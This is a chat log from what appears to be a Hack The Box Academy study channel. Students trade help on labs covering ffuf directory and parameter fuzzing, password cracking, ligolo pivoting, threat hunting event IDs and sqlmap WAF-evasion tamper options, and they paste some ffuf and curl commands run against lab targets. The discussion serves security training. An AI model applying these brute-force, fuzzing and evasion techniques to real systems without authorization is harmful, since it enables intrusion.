please, read it again

signal pike
#

It is by using the secretsdump tool?

lusty thicket
rustic sage
#

use info from current section and SAM section to retrieve the nessecary files

signal pike
#

Oh, thank you!

wide narwhal
#

Hey there, I'm currently doing the "Introduction to Threat Hunting & Hunting With Elastic" , I feel completely lost on the thought process of how to look for the correct Event.code ID and narrow my searches, how can I get better at determining the proper windows event ID or Sysmon ID ?

rustic sage
#

There should be a list of event IDs
1 : Process Create
2 : Process modifed time stamp
3 : Network Con
etc.

wide narwhal
#

From the module itself you mean ?

rustic sage
#

yea

empty trout
#

i am using gtfobins to downlad fileusing openssl and in the section we have to spun a server have a self signed cert when i am connecting to the server there is an error for not trusting that self sign cert

rustic sage
#

nvm

wide narwhal
#

I was doing the skill assessment for example and I found the #1 pretty easely, fine, however the hunt #2 and specially the #3 Im like "how the hell am I supposed to know that I needed to use this event.code ID ?

#

@rustic sage I see what you mean but still

rustic sage
#

ur on the skills assesment

wide narwhal
#

Yea, Introduction to Threat Hunting & Hunting With Elastic - Skill Assessment

tranquil axle
eager zinc
rustic sage
wide narwhal
#

For sysmon yes I agree there isn't a lot of IDs however for Hunt#3 for example

rustic sage
empty trout
wide narwhal
#

yes, I'm wondering how I could find event 4104

rustic sage
#

check which logs ur using

#

zeek or windows

empty trout
wide narwhal
#

even searching to Google with "powershell lateral movement windows id" I got a bunch of event ID except this one

wide narwhal
#

I read that but "4104" is not mentionned

eager zinc
empty trout
#

then use gobuster or ffuf for virtualhost bruteforcing

eager zinc
#

but do they give me service informations? so far i tried them and only found the subdomains

wide narwhal
#

Alright, I'll try to get better, it's just it doesn't click yet in my head

eager zinc
#

how to get information on a kown subdomain

empty trout
#

u need to find the version its in the section read it carefully

#

its very easy and dont forget to change hosts file and add teh ip of those vhost

eager zinc
#

okey ill try ffuf and read the man

tranquil axle
# wide narwhal even searching to Google with "powershell lateral movement windows id" I got a b...

something thats pretty cool (but a lot of information) is the sans posters on dfir. Look at this one for example (https://www.sans.org/posters/hunt-evil/) it talks about whats normal behavior and then shows common ways to detect lateral movement techniques and what event codes/registry entires/files are associated with it. They have a few of these posters

wide narwhal
#

@tranquil axle Thanks!

mortal locust
#

Hi everyone,

I'm currently working on the Brute Force Attack module, specifically the first exercise where we need to determine a PIN by brute forcing.

Before this module, we learned about ffuf. In the exercise, we are given the parameter to brute force (in this case, the PIN). However, I’m wondering what we would do if we weren’t provided with the parameter name (e.g., pin).

I tried using ffuf to discover the parameter, following the techniques we learned in the ffuf module. Unfortunately, this approach didn’t yield any results.

Does anyone have suggestions for identifying the correct parameter when it’s not explicitly provided?

Thanks!

cloud urchin
#

Viewing the source code?

mortal locust
cloud urchin
#

yes

mortal locust
#

so there is no source code at all

The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.

this is what is given when you browse the web app

#

so i used fuff and determine that a dircetory called oin is peresent

cloud urchin
#

idk what you're asking here, but you can view the elemnt id's by inspecting the source code, or maybe running the pages through burp

mortal locust
#

ffuf -u http://94.237.59.16:44890/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

    /'___\  /'___\           /'___\       
   /\ \__/ /\ \__/  __  __  /\ \__/       
   \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
    \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
     \ \_\   \ \_\  \ \____/  \ \_\       
      \/_/    \/_/   \/___/    \/_/       

   v2.1.0-dev

:: Method : GET
:: URL : http://94.237.59.16:44890/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500


pin [Status: 401, Size: 29, Words: 2, Lines: 2, Duration: 98ms]

#

so fuff gave me the directory

cloud urchin
#

ok what does fuzzing for directories with ffuf have to do with brute forcing a pin?

#

i don't understand your question

mortal locust
#

we need to get the parameter to determine where to bruteforce right?

#

directory > parameter determination > value bruteforcing

cloud urchin
#

which module and section are you on

mortal locust
#

Brute forcing attacks

cloud urchin
#

do you mean login brute forcing?

mortal locust
#

yes

cloud urchin
#

ok and which section?

mortal locust
#

Brute Forcing attacks > Brute Forcing attacks

cloud urchin
#

that section tells you the endpoint

mortal locust
#

yes but thats not the real worls schenario

#

world*

cloud urchin
#

ok but i explained that already

#

source code, inspecting requests in burp

mortal locust
#

surce code does not have anything

cloud urchin
#

yes it does

mortal locust
#

http:<IP>:<PORT>

It does only say URL not found (404 error)

eager zinc
#

Information Gathering - Web Edition > Fingerprinting
Which CMS is used on app.inlanefreight.local on the target system? Respond with the name only, e.g., WordPress

i tried everything i can think off, can i pm anyone who could able to guide me a little to understand how to get cms

cloud urchin
cloud urchin
eager zinc
#

Information Gathering - Web Edition > Fingerprinting

mortal locust
#

To get me the value of the parameter?

cloud urchin
mortal locust
cloud urchin
mortal locust
cloud urchin
#

you're fuzzing the query parameter not the value

mortal locust
#

yes thats what i want to get to!!

quaint aurora
#

He's searching for "pin" as the parameter, he hasn't found that one yet ;p

lusty thicket
mortal locust
#

As there was in fuff module we do 1.) directory fuzzing > 2.) then parameter fuzzing > 3.)the value fuzzing/bruteforcing

I am at 2nd step parameter fuzzing!! not the value

eager zinc
eager zinc
#

i trying that

lusty thicket
lusty thicket
mortal locust
#

nothing come up!!

quaint aurora
#

Idiot check on my end, can you add a :FUZZ to the end of your wordlist definition?

lusty thicket
quaint aurora
quaint aurora
# lusty thicket yes

Wasn't a question for myself hahaha more of a "can you try this and report back" type question

mortal locust
#

nothing came up by this as well

final elbow
#

hi, i am currently at the Nibbles part of my getting started module in CPTS and i was wondering how do i install LinEnum.sh, i dont think i have done it correctly as when i start the server, it does not run the script and give a ip

lusty thicket
cloud urchin
#

again, what's that got to do with something in the real world? your question was about real world but you keep going back to the module

mortal locust
cloud urchin
#

it all depends on the site

#

i told you exactly how to find it already

lusty thicket
mortal locust
#

ffuf -u http://94.237.59.16:44890/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

    /'___\  /'___\           /'___\       
   /\ \__/ /\ \__/  __  __  /\ \__/       
   \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
    \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
     \ \_\   \ \_\  \ \____/  \ \_\       
      \/_/    \/_/   \/___/    \/_/       

   v2.1.0-dev

:: Method : GET
:: URL : http://94.237.59.16:44890/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500


pin [Status: 401, Size: 29, Words: 2, Lines: 2, Duration: 98ms]

lusty thicket
#

does this module instruct you to add an entry in your hosts file?

final elbow
mortal locust
lusty thicket
#

ping me if you need more help

lusty thicket
mortal locust
#

i did -fs 29

#

check you dm

#

your*

#

ffuf -w testsss -u http://94.237.59.16:44890/pin?FUZZ=value

    /'___\  /'___\           /'___\       
   /\ \__/ /\ \__/  __  __  /\ \__/       
   \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
    \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
     \ \_\   \ \_\  \ \____/  \ \_\       
      \/_/    \/_/   \/___/    \/_/       

   v2.1.0-dev

:: Method : GET
:: URL : http://94.237.59.16:44890/pin?FUZZ=value
:: Wordlist : FUZZ: /home/taresh/testsss
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500


jshbdhbhf [Status: 401, Size: 29, Words: 2, Lines: 2, Duration: 100ms]
pin [Status: 401, Size: 29, Words: 2, Lines: 2, Duration: 101ms]
dhbhsd [Status: 401, Size: 29, Words: 2, Lines: 2, Duration: 101ms]
hsbdhb [Status: 401, Size: 29, Words: 2, Lines: 2, Duration: 101ms]

#

fuff cant see the difference pin have the same status, same size

teal sparrow
#

has anybody done the corperate OSINT module? i was thinking about doing it however its alot of cubes so i just wanna know what peoples thoughts on the module are

shut vapor
#

i'm using ligolo and my connection dies, if I try to start_tunnel again after reconnecting the agent I get:

error: a tunnel is already using this interface name. Please use a different name using the --tun option
I can't find any way of releasing that tunnel... tunnel_stop doesn't recognize it as in use. Anyone run into this and figure out a solution?

cloud urchin
#

does it show in your network interfaces? ip link show

shut vapor
#

Easy enough to create a new one I guess, I was hoping to just stop the old one instead of creating ligolo2..3..4

safe star
#

Delete the old one

#

if you know it’s gonna die then stop the tunnel first

#

That only happens to me sometimes tho, maybe you need a stable version

#

Had problems with the latest and been using 0.6.2 ever since

shut vapor
# cloud urchin does it show in your network interfaces? ```ip link show```

Thanks for asking, I shut the whole thing down so I can't check now but I'm sure it was in there. It's the start_tunnel command in the ligolo console that seems to be stuck. I'll keep an eye on downgrading to 0.6.2 as TLattice suggests just in case that's it. It might just be the janky connection I've got.

cloud urchin
#

no

rocky estuary
#

ligolo is a life changer i wished they added it to the pivoting module

green minnow
#

When you have a GET or POST you need to fuzz like 'FUZZ=key" how do you figure out that key is the right one?

#

Like you're also taught 'FUZZ=x' and FUZZ=y' in the modules

#

How do you know that x, y or key is correct

#

Curling empty post requests just says "access denied" and nothing useful.

#

Like if it returned "invalid parameter y="

cloud urchin
#

because you filter out the bad responses

green minnow
#

But if I start fuzzing "x=FUZZ" for get and the actual correct one is something like ?y=1 then every response will be wrong

cloud urchin
#

examine the requests to find out

green minnow
#

So I just insert random words until it does something?

#

sounds like it will take forever

cloud urchin
#

no you can fuzz it or observe the behavior of the website with your browser or burp or something

green minnow
#

I mean the modules tell you how to fuzz the second part of the something=something. But they don't tell you how to fuzz the first part

#

In the module they just give you that the correct get request is ?x=something and the correct post request is y=something

#

But I want to know how you get the x and y

cloud urchin
#

i just told you.. fuzz it or observe it

lusty thicket
green minnow
#

I tried manually several times but the message just remains the same

cloud urchin
#

which module/section/question is this about

green minnow
#

Web Fuzzing skills assesment

cloud urchin
#

web fuzzing?

#

which module... and what's your actual question here

green minnow
#

Like I did

curl -d "key="  http://94.237.48.46:45074/admin/index.php 
curl -d "x="  http://94.237.48.46:45074/admin/index.php
curl -d "y="  http://94.237.48.46:45074/admin/index.php```

And they all returned the same access denied message
#

Which tells me nothing. Earlier in the module it would reply with something like "invalid parameter y=" telling me that y=fuzz is correct thing to fuzz

lusty thicket
cloud urchin
#

yeah stick with what the module teaches

lusty thicket
#

aren't you supposed to fuzz for possible parameters?

green minnow
#

"+ 2 After completing all steps in the assessment, you will be presented with a page that contains a flag in the format of HTB{...}. What is that flag? "

cloud urchin
#

"web fuzzing" is not a module

green minnow
lusty thicket
cloud urchin
#

oh geez ok

#

lol i was looking at my notes from cpts path, that's not in it so that makes sense

#

so you probably need to fuzz it, not do it manually

pine dune
#

Hi guys

green minnow
#

I'll just run "fuzz=" with burp suite parameters wordlist and see if it does anything different

pine dune
#

can someone recommand a good wordlist from seclists thats good for value fuzzing

lusty thicket
#

where value is unknown

cloud urchin
pine dune
#

in the cbbh exam or cpts I assume the common wordlist will be too easy for htb or am I mistaken?

cloud urchin
#

it's against the rules to discuss the contents of the exam, however you can be assured everything in the exam is covered in the modules

lusty thicket
pine dune
#

also I tried using a number wordlist from 1-1000 for username and users which I made. However as user and username tend to be string is it correcct to assume it SHOULD be a string and that the website wouldn't typically assign users by numbers

#

?

pine dune
#

Im happy the 5 second timer is removed as well that was annoying asl

#

should I use the "usernames" directory?

#

as one of the parameters hinted towards that

lusty thicket
lusty thicket
pine dune
pine dune
#

should I use top-usernames?

green minnow
#

I tried GET fuzzing with ?FUZZ=value and ?FUZZ = admin and POST fuzzing with FUZZ=value and FUZZ=admin and got nothing. Which is what I expected

lusty thicket
pine dune
green minnow
#

It could be FUZZ=ass for all I know which means every response would be wrong.

pine dune
cloud urchin
lusty thicket
green minnow
green minnow
pine dune
pine dune
#

ffuf right?

green minnow
#

There's two different webfuzzing modules which are almost exactly the same which makes things confusing

lusty thicket
#

in the bug bounty path

pine dune
#

im on this in the cbbh

green minnow
#

One is called Web Fuzzing and the other is called Attacking Web Applications via FFUF

pine dune
#

ahh yea im on the attacking web apps with ffuf

green minnow
#

Oh I did that one yesterday

pine dune
#

nice we must be close

#

wanna be study buddies?

green minnow
#

alri

#

I think there might even be a third web fuzzing module because when you search google for help there's people talking about a http://fuzzing-fun.htb

pine dune
#

probably related in one of the modules somewhere

civic steeple
#

i'm on the medium machine at the end of Footprinting and i'm curious as to how some of you keep track of the various branches you're led down as you're working with one set of credentials, then find another and maybe don't exhaust the first user before digging through the second?

green minnow
#

Sigh there's another page that FFuF just didn't find. I hate when this happens. I waste like an hour trying to do something on one page because FuFF failed to find the correct page in the initial scan.

pine dune
#

@cloud urchin @lusty thicket I tried the common.txt and also the username.txt and no results

#

any ideas?

green minnow
#

Last night I wasted 2 hours cause gobuster didn't find a subdomain it was supposed to. The correct word was even in the wordlist, but it just didn't find it.

#

Happened to someone else here too at the same time

pine dune
#

something similar happened to me with the password atatck module

#

i think its a problem either with the tool or htb

green minnow
#

I've started running every scan 3 times now

lusty thicket
green minnow
pine dune
lusty thicket
#

etc

lusty thicket
green minnow
#

@pine dune what question you stuck on?

pine dune
pine dune
green minnow
#

I'll have a look what I did yesterday

pine dune
#

thanks

#

wait

#

im getting hits with the 10 mil username .txt

pine dune
green minnow
#

Yeah I couldn't see anything wrong with your previous commands, just probably a wordlist issue.

gray yacht
green minnow
pine dune
gray yacht
# green minnow I dunno but last night we had 2 examples in here of gobuster failing to find a s...

And that is still not a bad thing (I mean it is when you spend hours trying to get it work, but I just move to a different tool if it isn't working). Annotate what didn't work and if you know why, include the why. Maybe down the road you can circle back and mess with it some more and figure out why it didn't work correctly or you can decide that it just isn't a tool you wish to use any longer.

green minnow
#

I guess if you have lots of study time it can be useful. But I don't, I have about 2 hours a night after work. So if I get 2 hours of wasted time that's a bummer.

pine dune
#

but works with curl?

gray yacht
pine dune
#

sorry about that 😅 spoiler

cloud urchin
#

bro stop spoiling

pine dune
#

sorry smh I was just about to remove the param sorry again

#

how can I ask the question?

ocean night
#

Yeha, please stop spoiling.

pine dune
#

like why it doesnt work with browser but works with curl

#

im sorry guys

ocean night
#

If it involves specifics, go to DMs with anyone that can help

ocean night
green minnow
#

Should there be something over at fuzzing_(redacted).htb I just get "unable to connect" in browser

#

But it does reply to pings

gray yacht
green minnow
#

yes

gray yacht
fickle thicket
#

why sometimes the IP address just cannot spawn

lusty thicket
last aspen
#

hello, am still practicing linux fundamentals but i wont pass through kernel version information as i get incorrect response everytime i try to answer,please help me out prayge

last aspen
vagrant wraith
#

try getting a shell in metasploit and while u background try out the suggester module

last aspen
#

oky i shall try that, thanks

eager zinc
#

wayback machine for hackthebox doesnt seem to be working

#

this opens when i click that snap

cloud urchin
rocky estuary
#

ahhhhh finally after grinding for 3 months 8-12 hours daily finally i completed the path it feels so good

sweet jewel
#

DACL Attacks I - Skill Assessment

Find the credentials to connect via RDP to WS01 and submit the flag in the Administrator's desktop as the answer. Use port 13389 to connect to WS01.
the IP from the spawned target points to DC01(10.129.205.122), not WS01 and there is no route to WS01(172.17.17.10). how am i meant to do this question

#

i have the credentials of WS01 from ||laps||

slender robin
#

i'm having issue w Attacking Common Services's FTP machine.

#

It seems there is no FTP port running, i tried several times but no luck. Any help?

cloud urchin
#

are you using the right port?

slender robin
rustic sage
#

im stuck on living off the land

#

last question

#

Active Directory Enumeration & Attacks ---Living Off the Land

civic steeple
rocky estuary
# civic steeple Thoughts on taking the exam? Feel confident? I’m more curious how you feel now ...

take it step by step each module is important the path doesn't work in way that first modules are easy and the the last ones are hard no each module introduce you to a new stuff which they are hard in there own way take good notes don't just solve question and move on try to experiment with various technique shown in each section and don't think about next modules there's a module in the end the AEN will test everything you know

bright coral
fathom pendant
#

Oh wait nvm

#

Misread

strange moth
#

Hey

#

What is hackthebox all about ?

cobalt osprey
#

hello guys, i am having some troubles doing the protected archives section on password attacks module
I am using the john2zip command to generate the file with the hash, but when i use john with rockyou and the generated file it says that 0 hashes has been cracked
What am i doing wrong? Ty

bright coral
cobalt osprey
#

ok i risolved, ty for the hint brother

sweet jewel
#

i should've read the instructions more closely

cold marsh
#

hello there! i need help on Documentation & Reporting Practice Lab. DM me (Y)

cobalt osprey
#

hello, i need help on attacking passwords easy lab, if u can dM me

teal sparrow
#

has anybody done the corperate OSINT module? i was thinking about doing it however its alot of cubes so i just wanna know what peoples thoughts on the module are

digital crown
#

injection attacks
skill assesment
question: "should my payload work" I'll dm it to you, to avoid spoilers

#

phase of internal access

#

@analog dock could i dm you fingerguns

digital crown
errant tree
#

gm

chilly echo
#

Pasword attacks skill assesment hard
There is a vhd file which i got and cracked the password of that file
I dont how to proceed

smoky elbow
acoustic owl
smoky elbow
#

sorry I passed it

#

thx

chilly echo
acoustic owl
chilly echo
civic steeple
#

I'm on Footprinting Lab - Medium, well past where you find user: sa and password. I've been on this thing for two hours bouncing around and finally gave in. How would anyone guess to use Administrator in place of sa? Is that something one would know to try with just more experience or did i miss a clue somewhere?

fathom pendant
river skiff
#

Hey folks, someone around for a quick question regarding AEN module?

civic steeple
fathom pendant
fathom pendant
civic steeple
# fathom pendant Assume passwords are reused

Again maybe I missed a step or a clue somewhere. Just not sure why I would’ve thought to take the username I found (sa) and replace it with Administrator. Is that a known thing to do in the industry?

river skiff
fathom pendant
fathom pendant
civic steeple
river skiff
visual umbra
#

Hello.
I have sat for several days with the Skill Assessment for sqlmap essintials.
I've tried every possible solution I can think of, at first I sat for a long time without success, but I managed to get the database, but just as I was about to drop the flag, the target died. After that nothing has worked at all to get into the db. But the other day something strange happened, sqlmap spit out a db but it was "Cubrid", I'm pretty sure it must be mysql, since that's what was shown when I ran manual tests. This db looked completely distorted (see picture). I don't know what to do, I'm running out of suggestions for solutions.
A friend who works in RedTam said that it could possibly be that there is something wrong with the box or that there are many users and the dbs get destroyed or something. Can someone point me in the right direction, what actually worked when I captured the database that time was :||tamper=space2comment,randomcase,between,apostrophemask --random -agent --batch --no-cast||

Please can someone help me and give me a clue?

#

im going forward, now i can inject.. i let you know if i need help

eager zinc
#

while fuzzing i get this lines in fuff, im not sure these are relevant and helpful, is there a way to filter only usable info?

tranquil axle
#

you can use the -ic parameter to "ignore comments". These # lines are comments in the wordlist and often get detected as real urls due to the # having a special meaning in urls

eager zinc
#

okey thanks

visual umbra
#

Something must have been wrong with the Skill Assessment target on slqmap Esenssial, as I said it took several days to access the database, caught it one day but the target went down and I have tested for several days and nothing has worked, now suddenly it works ifen with the same command that worked the first time..

tranquil axle
#

I dont remember the skill assessment, but there are two things to be aware of: first, there are parameters for the command that tell sqlmap to try methods that are more rare (using --level and --risk), the default option may not catch the needed method.

Second: Timebased sql attacks rely heavily on a steady connection. If your connection to the VM is bad then it might not detect time based attacks correctly. And even if the connection is fine and it detected a time based attack, extracting information via time based attacks takes a long time. I would advice trying all the other attack methods first before looking for time based ones. Especially because sqlmap will stop once it finds a attack vector, even if a different one might also exist and might be much faster in execution. If I remember correctly sqlmap by default does not check time based attacks last

dire granite
#

Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the answer.

chilly echo
digital crown
#

Yeah, thats my issue too

acoustic owl
tulip dragon
#

is there time limit for non sub user ,for pwnbox like only 2 hr /day or not

burnt spruce
#

Exploit the target and find the hostname of the router in the devicedetails directory at the root of the file system.

So i in the machine with rconfig_vendors_auth_file_upload_rce and when i trying to get to the root folder i just get, no permission error

#

Shells & Payloads
Infiltrating Unix/Linux

fathom pendant